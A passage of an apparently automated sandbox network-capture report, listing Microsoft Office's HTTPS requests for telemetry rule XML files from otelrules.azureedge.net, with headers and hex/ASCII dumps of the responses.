                                                                    2024-10-28 13:03:37 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    124192.168.2.44987913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:37 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:37 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:37 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1403
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                    ETag: "0x8DC582BDCB4853F"
                                                                    x-ms-request-id: 0df29f50-101e-005a-068d-27882b000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130337Z-16849878b78x6gn56mgecg60qc00000006yg00000000350n
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:37 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    125192.168.2.44988013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:37 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:37 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:37 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1366
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                    ETag: "0x8DC582BDB779FC3"
                                                                    x-ms-request-id: 16f71f95-f01e-0099-73fb-259171000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130337Z-15b8d89586fnsf5zd126eyaetw0000000670000000007grd
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:37 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    126192.168.2.44988113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:38 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:38 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:38 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1397
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                    ETag: "0x8DC582BDFD43C07"
                                                                    x-ms-request-id: 3bd815fc-c01e-0066-6070-26a1ec000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130338Z-16849878b785dznd7xpawq9gcn00000006dg00000000cfct
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:38 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    127192.168.2.44988313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:38 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:38 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:38 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1360
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                    ETag: "0x8DC582BDD74D2EC"
                                                                    x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130338Z-16849878b78qf2gleqhwczd21s000000055g00000000fdp2
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:38 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    128192.168.2.44988213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:38 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:38 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:38 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1427
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                    ETag: "0x8DC582BE56F6873"
                                                                    x-ms-request-id: 08f6a26f-f01e-0071-6b1c-27431c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130338Z-16849878b78j5kdg3dndgqw0vg00000006rg00000000d5ve
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:38 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    129192.168.2.44988413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:38 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:38 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:38 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1390
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                    ETag: "0x8DC582BE3002601"
                                                                    x-ms-request-id: c0e66d29-801e-00a0-12d5-272196000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130338Z-r197bdfb6b4gx6v9pg74w9f47s00000006xg000000004f77
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:38 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    130192.168.2.44988513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:38 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:38 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:38 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1401
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                    ETag: "0x8DC582BE2A9D541"
                                                                    x-ms-request-id: ee736da1-b01e-001e-7be0-260214000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130338Z-17c5cb586f66g7mvbfuqdb2m3n00000005700000000043mp
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:38 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    131192.168.2.44988613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:39 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:39 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:39 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1364
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                    ETag: "0x8DC582BEB6AD293"
                                                                    x-ms-request-id: 4e9c2d7b-a01e-0053-0a2e-278603000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130339Z-15b8d89586f42m673h1quuee4s0000000940000000006rhp
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:39 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    132192.168.2.44988713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:39 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:39 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:39 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1391
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                    ETag: "0x8DC582BDF58DC7E"
                                                                    x-ms-request-id: 4fde2afa-301e-0099-279b-276683000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130339Z-17c5cb586f626sn8grcgm1gf8000000003gg000000007pb4
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:39 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    133192.168.2.44988813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:39 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:39 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:39 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1354
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                    ETag: "0x8DC582BE0662D7C"
                                                                    x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130339Z-15b8d89586f989rkfw99rwd68g00000006ag0000000055aa
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
